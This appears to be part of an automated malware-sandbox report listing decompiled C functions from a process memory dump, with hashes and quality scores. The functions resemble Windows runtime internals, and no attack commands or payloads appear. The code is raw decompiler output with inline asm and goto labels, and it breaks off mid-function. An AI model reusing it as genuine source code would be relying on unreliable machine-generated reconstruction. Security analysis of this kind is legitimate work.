                        • Instruction Fuzzy Hash: 844193B1D003189EDB14CFAAD981AEDFBF5FB48710F9081AEE509A7640E7705A45CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E02BCE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                        				intOrPtr* _v0;
                        				signed char _v4;
                        				signed int _v8;
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t37;
                        				intOrPtr _t38;
                        				signed int _t44;
                        				signed char _t52;
                        				void* _t54;
                        				intOrPtr* _t56;
                        				void* _t58;
                        				char* _t59;
                        				signed int _t62;
                        
                        				_t58 = __edx;
                        				_push(0);
                        				_push(4);
                        				_push( &_v8);
                        				_push(0x24);
                        				_push(0xffffffff);
                        				if(E02BD9670() < 0) {
                        					L02BEDF30(_t54, _t58, _t35);
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(_t54);
                        					_t52 = _v4;
                        					if(_t52 > 8) {
                        						_t37 = 0xc0000078;
                        					} else {
                        						_t38 =  *0x2c87b9c; // 0x0
                        						_t62 = _t52 & 0x000000ff;
                        						_t59 = L02BB4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                        						if(_t59 == 0) {
                        							_t37 = 0xc0000017;
                        						} else {
                        							_t56 = _v0;
                        							 *(_t59 + 1) = _t52;
                        							 *_t59 = 1;
                        							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                        							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                        							_t44 = _t62 - 1;
                        							if(_t44 <= 7) {
                        								switch( *((intOrPtr*)(_t44 * 4 +  &M02BCE810))) {
                        									case 0:
                        										L6:
                        										 *((intOrPtr*)(_t59 + 8)) = _a8;
                        										goto L7;
                        									case 1:
                        										L13:
                        										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                        										goto L6;
                        									case 2:
                        										L12:
                        										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                        										goto L13;
                        									case 3:
                        										L11:
                        										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                        										goto L12;
                        									case 4:
                        										L10:
                        										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                        										goto L11;
                        									case 5:
                        										L9:
                        										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                        										goto L10;
                        									case 6:
                        										L17:
                        										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                        										goto L9;
                        									case 7:
                        										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                        										goto L17;
                        								}
                        							}
                        							L7:
                        							 *_a40 = _t59;
                        							_t37 = 0;
                        						}
                        					}
                        					return _t37;
                        				} else {
                        					_push(0x20);
                        					asm("ror eax, cl");
                        					return _a4 ^ _v8;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da16b8920f0ac9eca064e4749c6e25bdfd177d17b80a1b0ea2c2c3831b7d34b9
                        • Instruction ID: 2aa6d6839310d92fffc3577f8c534f6630bfc3af94d0f0e0c46a201e5659339f
                        • Opcode Fuzzy Hash: da16b8920f0ac9eca064e4749c6e25bdfd177d17b80a1b0ea2c2c3831b7d34b9
                        • Instruction Fuzzy Hash: EE318F75A14249EFD704CF58D840B96B7E8FB08314F1482AAFA04CB341E631ED90CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02BCBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr _t22;
                        				intOrPtr* _t41;
                        				intOrPtr _t51;
                        
                        				_t51 =  *0x2c86100; // 0xf
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				if(_t51 >= 0x800) {
                        					L12:
                        					return 0;
                        				} else {
                        					goto L1;
                        				}
                        				while(1) {
                        					L1:
                        					_t22 = _t51;
                        					asm("lock cmpxchg [ecx], edx");
                        					if(_t51 == _t22) {
                        						break;
                        					}
                        					_t51 = _t22;
                        					if(_t22 < 0x800) {
                        						continue;
                        					}
                        					goto L12;
                        				}
                        				E02BB2280(0xd, 0xde9f1a0);
                        				_t41 =  *0x2c860f8; // 0x0
                        				if(_t41 != 0) {
                        					 *0x2c860f8 =  *_t41;
                        					 *0x2c860fc =  *0x2c860fc + 0xffff;
                        				}
                        				E02BAFFB0(_t41, 0x800, 0xde9f1a0);
                        				if(_t41 != 0) {
                        					L6:
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                        					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                        					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                        					do {
                        						asm("lock xadd [0x2c860f0], ax");
                        						 *((short*)(_t41 + 0x34)) = 1;
                        					} while (1 == 0);
                        					goto L8;
                        				} else {
                        					_t41 = L02BB4620(0x2c86100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                        					if(_t41 == 0) {
                        						L11:
                        						asm("lock dec dword [0x2c86100]");
                        						L8:
                        						return _t41;
                        					}
                        					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                        					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                        					if(_t41 == 0) {
                        						goto L11;
                        					}
                        					goto L6;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f02b490e675dd3695e32fec1d4cb820cc4222948da031de8130e3fe37242b37
                        • Instruction ID: 5084327340910ac9ab5cf1405150427024860edf8a2f05e831882b3afc291fe9
                        • Opcode Fuzzy Hash: 8f02b490e675dd3695e32fec1d4cb820cc4222948da031de8130e3fe37242b37
                        • Instruction Fuzzy Hash: 4B310132A006159BCB01EF58D8817AA73B8FF18319F2085B9ED45DB241E774D905CBC4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02B99100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                        				signed int _t53;
                        				signed int _t56;
                        				signed int* _t60;
                        				signed int _t63;
                        				signed int _t66;
                        				signed int _t69;
                        				void* _t70;
                        				intOrPtr* _t72;
                        				void* _t78;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t82;
                        				void* _t85;
                        				void* _t88;
                        				void* _t89;
                        
                        				_t84 = __esi;
                        				_t70 = __ecx;
                        				_t68 = __ebx;
                        				_push(0x2c);
                        				_push(0x2c6f6e8);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((char*)(_t85 - 0x1d)) = 0;
                        				_t82 =  *((intOrPtr*)(_t85 + 8));
                        				if(_t82 == 0) {
                        					L4:
                        					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                        						E02C688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                        					}
                        					L5:
                        					return E02BED130(_t68, _t82, _t84);
                        				}
                        				_t88 = _t82 -  *0x2c886c0; // 0x27307b0
                        				if(_t88 == 0) {
                        					goto L4;
                        				}
                        				_t89 = _t82 -  *0x2c886b8; // 0x0
                        				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L4;
                        				} else {
                        					E02BB2280(_t82 + 0xe0, _t82 + 0xe0);
                        					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                        					__eflags =  *((char*)(_t82 + 0xe5));
                        					if(__eflags != 0) {
                        						E02C688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                        						goto L12;
                        					} else {
                        						__eflags =  *((char*)(_t82 + 0xe4));
                        						if( *((char*)(_t82 + 0xe4)) == 0) {
                        							 *((char*)(_t82 + 0xe4)) = 1;
                        							_push(_t82);
                        							_push( *((intOrPtr*)(_t82 + 0x24)));
                        							E02BDAFD0();
                        						}
                        						while(1) {
                        							_t60 = _t82 + 8;
                        							 *(_t85 - 0x2c) = _t60;
                        							_t68 =  *_t60;
                        							_t80 = _t60[1];
                        							 *(_t85 - 0x28) = _t68;
                        							 *(_t85 - 0x24) = _t80;
                        							while(1) {
                        								L10:
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t84 = _t68;
                        								 *(_t85 - 0x30) = _t80;
                        								 *(_t85 - 0x24) = _t80 - 1;
                        								asm("lock cmpxchg8b [edi]");
                        								_t68 = _t84;
                        								 *(_t85 - 0x28) = _t68;
                        								 *(_t85 - 0x24) = _t80;
                        								__eflags = _t68 - _t84;
                        								_t82 =  *((intOrPtr*)(_t85 + 8));
                        								if(_t68 != _t84) {
                        									continue;
                        								}
                        								__eflags = _t80 -  *(_t85 - 0x30);
                        								if(_t80 !=  *(_t85 - 0x30)) {
                        									continue;
                        								}
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t63 = 0;
                        								 *(_t85 - 0x34) = 0;
                        								_t84 = 0;
                        								__eflags = 0;
                        								while(1) {
                        									 *(_t85 - 0x3c) = _t84;
                        									__eflags = _t84 - 3;
                        									if(_t84 >= 3) {
                        										break;
                        									}
                        									__eflags = _t63;
                        									if(_t63 != 0) {
                        										L40:
                        										_t84 =  *_t63;
                        										__eflags = _t84;
                        										if(_t84 != 0) {
                        											_t84 =  *(_t84 + 4);
                        											__eflags = _t84;
                        											if(_t84 != 0) {
                        												 *0x2c8b1e0(_t63, _t82);
                        												 *_t84();
                        											}
                        										}
                        										do {
                        											_t60 = _t82 + 8;
                        											 *(_t85 - 0x2c) = _t60;
                        											_t68 =  *_t60;
                        											_t80 = _t60[1];
                        											 *(_t85 - 0x28) = _t68;
                        											 *(_t85 - 0x24) = _t80;
                        											goto L10;
                        										} while (_t63 == 0);
                        										goto L40;
                        									}
                        									_t69 = 0;
                        									__eflags = 0;
                        									while(1) {
                        										 *(_t85 - 0x38) = _t69;
                        										__eflags = _t69 -  *0x2c884c0;
                        										if(_t69 >=  *0x2c884c0) {
                        											break;
                        										}
                        										__eflags = _t63;
                        										if(_t63 != 0) {
                        											break;
                        										}
                        										_t66 = E02C69063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                        										__eflags = _t66;
                        										if(_t66 == 0) {
                        											_t63 = 0;
                        											__eflags = 0;
                        										} else {
                        											_t63 = _t66 + 0xfffffff4;
                        										}
                        										 *(_t85 - 0x34) = _t63;
                        										_t69 = _t69 + 1;
                        									}
                        									_t84 = _t84 + 1;
                        								}
                        								__eflags = _t63;
                        							}
                        							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                        							 *((char*)(_t82 + 0xe5)) = 1;
                        							 *((char*)(_t85 - 0x1d)) = 1;
                        							L12:
                        							 *(_t85 - 4) = 0xfffffffe;
                        							E02B9922A(_t82);
                        							_t53 = E02BB7D50();
                        							__eflags = _t53;
                        							if(_t53 != 0) {
                        								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        							} else {
                        								_t56 = 0x7ffe0386;
                        							}
                        							__eflags =  *_t56;
                        							if( *_t56 != 0) {
                        								_t56 = E02C68B58(_t82);
                        							}
                        							__eflags =  *((char*)(_t85 - 0x1d));
                        							if( *((char*)(_t85 - 0x1d)) != 0) {
                        								__eflags = _t82 -  *0x2c886c0; // 0x27307b0
                        								if(__eflags != 0) {
                        									__eflags = _t82 -  *0x2c886b8; // 0x0
                        									if(__eflags == 0) {
                        										_t79 = 0x2c886bc;
                        										_t72 = 0x2c886b8;
                        										goto L18;
                        									}
                        									__eflags = _t56 | 0xffffffff;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										E02B99240(_t68, _t82, _t82, _t84, __eflags);
                        									}
                        								} else {
                        									_t79 = 0x2c886c4;
                        									_t72 = 0x2c886c0;
                        									L18:
                        									E02BC9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                        								}
                        							}
                        							goto L5;
                        						}
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ae19d3ef20eb901dc55db8e87e3918bfb40f1e93c3cbcd2fdb5cbce831488fa
                        • Instruction ID: 14aad9a6dbbdeb09de70f29b58610d0e6527c9e2e45bc674bf41c3497075ece4
                        • Opcode Fuzzy Hash: 9ae19d3ef20eb901dc55db8e87e3918bfb40f1e93c3cbcd2fdb5cbce831488fa
                        • Instruction Fuzzy Hash: C8318E75A01A95EFDFA5DB68C488BACBBB2FB48354F1882EDC40567251C370A9C4CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E02BC1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr* _v20;
                        				void* _t22;
                        				char _t23;
                        				void* _t36;
                        				intOrPtr _t42;
                        				intOrPtr _t43;
                        
                        				_v12 = __ecx;
                        				_t43 = 0;
                        				_v20 = __edx;
                        				_t42 =  *__edx;
                        				 *__edx = 0;
                        				_v16 = _t42;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(6);
                        				_push(0);
                        				_push(__ecx);
                        				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                        				_push(_t36);
                        				_t22 = E02BBF460();
                        				if(_t22 < 0) {
                        					if(_t22 == 0xc0000023) {
                        						goto L1;
                        					}
                        					L3:
                        					return _t43;
                        				}
                        				L1:
                        				_t23 = _v8;
                        				if(_t23 != 0) {
                        					_t38 = _a4;
                        					if(_t23 >  *_a4) {
                        						_t42 = L02BB4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                        						if(_t42 == 0) {
                        							goto L3;
                        						}
                        						_t23 = _v8;
                        					}
                        					_push( &_v8);
                        					_push(_t23);
                        					_push(_t42);
                        					_push(6);
                        					_push(_t43);
                        					_push(_v12);
                        					_push(_t36);
                        					if(E02BBF460() < 0) {
                        						if(_t42 != 0 && _t42 != _v16) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                        						}
                        						goto L3;
                        					}
                        					 *_v20 = _t42;
                        					 *_a4 = _v8;
                        				}
                        				_t43 = 1;
                        				goto L3;
                        			}













                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: 8017d833295f656468315ca7a3998b5715e0f6eb0d3afffdc7d9b9bbe1e912bf
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 19217172610119FBD721CF9DCC80EAABBBDFF85644F254099E505E7211D774AD01DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E02BB0050(void* __ecx) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				signed int _t34;
                        				void* _t40;
                        				void* _t41;
                        				signed int _t44;
                        				intOrPtr _t47;
                        				signed int _t58;
                        				void* _t59;
                        				void* _t61;
                        				void* _t62;
                        				signed int _t64;
                        
                        				_push(__ecx);
                        				_v8 =  *0x2c8d360 ^ _t64;
                        				_t61 = __ecx;
                        				_t2 = _t61 + 0x20; // 0x20
                        				E02BC9ED0(_t2, 1, 0);
                        				_t52 =  *(_t61 + 0x8c);
                        				_t4 = _t61 + 0x8c; // 0x8c
                        				_t40 = _t4;
                        				do {
                        					_t44 = _t52;
                        					_t58 = _t52 & 0x00000001;
                        					_t24 = _t44;
                        					asm("lock cmpxchg [ebx], edx");
                        					_t52 = _t44;
                        				} while (_t52 != _t44);
                        				if(_t58 == 0) {
                        					L7:
                        					_pop(_t59);
                        					_pop(_t62);
                        					_pop(_t41);
                        					return E02BDB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                        				}
                        				asm("lock xadd [esi], eax");
                        				_t47 =  *[fs:0x18];
                        				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                        				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t30 != 0) {
                        					if( *_t30 == 0) {
                        						goto L4;
                        					}
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					L5:
                        					if( *_t31 != 0) {
                        						_t18 = _t61 + 0x78; // 0x78
                        						E02C68A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                        					}
                        					_t52 =  *(_t61 + 0x5c);
                        					_t11 = _t61 + 0x78; // 0x78
                        					_t34 = E02BC9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                        					_t24 = _t34 | 0xffffffff;
                        					asm("lock xadd [esi], eax");
                        					if((_t34 | 0xffffffff) == 0) {
                        						 *0x2c8b1e0(_t61);
                        						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                        					}
                        					goto L7;
                        				}
                        				L4:
                        				_t31 = 0x7ffe0386;
                        				goto L5;
                        			}





















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87d1f96523a19bf7bad5292e7fb8406b4db9a488a8dcfb91578f86acdc928850
                        • Instruction ID: e7cdff236ce35c6ccb09dbc169f0a66d9358f92caf9e361088b96757cb8c73cc
                        • Opcode Fuzzy Hash: 87d1f96523a19bf7bad5292e7fb8406b4db9a488a8dcfb91578f86acdc928850
                        • Instruction Fuzzy Hash: BF318E31601B08CFD726DF28C844BA7B3E5FF88714F144AADE59A87A90EB75A801CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02C16C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                        				signed short* _v8;
                        				signed char _v12;
                        				void* _t22;
                        				signed char* _t23;
                        				intOrPtr _t24;
                        				signed short* _t44;
                        				void* _t47;
                        				signed char* _t56;
                        				signed char* _t58;
                        
                        				_t48 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t44 = __ecx;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t22 = E02BB7D50();
                        				_t58 = 0x7ffe0384;
                        				if(_t22 == 0) {
                        					_t23 = 0x7ffe0384;
                        				} else {
                        					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				}
                        				if( *_t23 != 0) {
                        					_t24 =  *0x2c87b9c; // 0x0
                        					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                        					_t23 = L02BB4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                        					_t56 = _t23;
                        					if(_t56 != 0) {
                        						_t56[0x24] = _a4;
                        						_t56[0x28] = _a8;
                        						_t56[6] = 0x1420;
                        						_t56[0x20] = _v12;
                        						_t14 =  &(_t56[0x2c]); // 0x2c
                        						E02BDF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                        						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                        						if(E02BB7D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						}
                        						_push(_t56);
                        						_push(_t47 - 0x20);
                        						_push(0x402);
                        						_push( *_t58 & 0x000000ff);
                        						E02BD9AE0();
                        						_t23 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                        					}
                        				}
                        				return _t23;
                        			}













                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a17d36e93f5013ecc5f78ad0b82a0831592f47ea340d0f356c72beab1311b1e
                        • Instruction ID: bb31e914620505a0a25b74d4f6d1984d74516c80cc8fa2447ee3da3391a8d544
                        • Opcode Fuzzy Hash: 2a17d36e93f5013ecc5f78ad0b82a0831592f47ea340d0f356c72beab1311b1e
                        • Instruction Fuzzy Hash: 02219CB2A00A44ABC711DB69D850F6AB7B8FF48744F1440A9F805C7791EB34ED10DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02BD90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                        				intOrPtr* _v0;
                        				void* _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				char _v36;
                        				void* _t38;
                        				intOrPtr _t41;
                        				void* _t44;
                        				signed int _t45;
                        				intOrPtr* _t49;
                        				signed int _t57;
                        				signed int _t58;
                        				intOrPtr* _t59;
                        				void* _t62;
                        				void* _t63;
                        				void* _t65;
                        				void* _t66;
                        				signed int _t69;
                        				intOrPtr* _t70;
                        				void* _t71;
                        				intOrPtr* _t72;
                        				intOrPtr* _t73;
                        				char _t74;
                        
                        				_t65 = __edx;
                        				_t57 = _a4;
                        				_t32 = __ecx;
                        				_v8 = __edx;
                        				_t3 = _t32 + 0x14c; // 0x14c
                        				_t70 = _t3;
                        				_v16 = __ecx;
                        				_t72 =  *_t70;
                        				while(_t72 != _t70) {
                        					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                        						L24:
                        						_t72 =  *_t72;
                        						continue;
                        					}
                        					_t30 = _t72 + 0x10; // 0x10
                        					if(E02BED4F0(_t30, _t65, _t57) == _t57) {
                        						return 0xb7;
                        					}
                        					_t65 = _v8;
                        					goto L24;
                        				}
                        				_t61 = _t57;
                        				_push( &_v12);
                        				_t66 = 0x10;
                        				if(E02BCE5E0(_t57, _t66) < 0) {
                        					return 0x216;
                        				}
                        				_t73 = L02BB4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                        				if(_t73 == 0) {
                        					_t38 = 0xe;
                        					return _t38;
                        				}
                        				_t9 = _t73 + 0x10; // 0x10
                        				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                        				E02BDF3E0(_t9, _v8, _t57);
                        				_t41 =  *_t70;
                        				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                        					_t62 = 3;
                        					asm("int 0x29");
                        					_push(_t62);
                        					_push(_t57);
                        					_push(_t73);
                        					_push(_t70);
                        					_t71 = _t62;
                        					_t74 = 0;
                        					_v36 = 0;
                        					_t63 = E02BCA2F0(_t62, _t71, 1, 6,  &_v36);
                        					if(_t63 == 0) {
                        						L20:
                        						_t44 = 0x57;
                        						return _t44;
                        					}
                        					_t45 = _v12;
                        					_t58 = 0x1c;
                        					if(_t45 < _t58) {
                        						goto L20;
                        					}
                        					_t69 = _t45 / _t58;
                        					if(_t69 == 0) {
                        						L19:
                        						return 0xe8;
                        					}
                        					_t59 = _v0;
                        					do {
                        						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                        							goto L18;
                        						}
                        						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                        						 *_t59 = _t49;
                        						if( *_t49 != 0x53445352) {
                        							goto L18;
                        						}
                        						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                        						return 0;
                        						L18:
                        						_t63 = _t63 + 0x1c;
                        						_t74 = _t74 + 1;
                        					} while (_t74 < _t69);
                        					goto L19;
                        				}
                        				 *_t73 = _t41;
                        				 *((intOrPtr*)(_t73 + 4)) = _t70;
                        				 *((intOrPtr*)(_t41 + 4)) = _t73;
                        				 *_t70 = _t73;
                        				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                        				return 0;
                        			}



























                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 955a27846859369ae798b8329f238336fec8564ebd92959c9fe4cddfcd7e6e33
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: 95218E71A00A05EFDB21DF59C845AAAF7F8EF44710F1488AAE949A7200E374ED40CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02BC3B7A(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v20;
                        				intOrPtr _t17;
                        				intOrPtr _t26;
                        				void* _t35;
                        				void* _t38;
                        				void* _t41;
                        				intOrPtr _t44;
                        
                        				_t17 =  *0x2c884c4; // 0x0
                        				_v12 = 1;
                        				_v8 =  *0x2c884c0 * 0x4c;
                        				_t41 = __ecx;
                        				_t35 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2c884c0 * 0x4c);
                        				if(_t35 == 0) {
                        					_t44 = 0xc0000017;
                        				} else {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t35);
                        					_push(4);
                        					_push( &_v12);
                        					_push(0x6b);
                        					_t44 = E02BDAA90();
                        					_v20 = _t44;
                        					if(_t44 >= 0) {
                        						E02BDFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2c884c0 * 0xc);
                        						_t38 = _t35;
                        						if(_t35 < _v8 + _t35) {
                        							do {
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                        							} while (_t38 < _v8 + _t35);
                        							_t44 = _v20;
                        						}
                        					}
                        					_t26 =  *0x2c884c4; // 0x0
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                        				}
                        				return _t44;
                        			}













                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63a97cddd09e67b712e22fc95582cc2319ce08e087d6b2e480b1e15000024fa6
                        • Instruction ID: ffeb2cbd97c0decf8f71e40f943883125c86f2003cf7184b348e232042206f24
                        • Opcode Fuzzy Hash: 63a97cddd09e67b712e22fc95582cc2319ce08e087d6b2e480b1e15000024fa6
                        • Instruction Fuzzy Hash: 9E21CF73A00108AFC700DF98CD81BAEB7BEFB84308F2541A8E909AB651D771ED51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02C16CF0(void* __edx, intOrPtr _a4, short _a8) {
                        				char _v8;
                        				char _v12;
                        				char _v16;
                        				char _v20;
                        				char _v28;
                        				char _v36;
                        				char _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
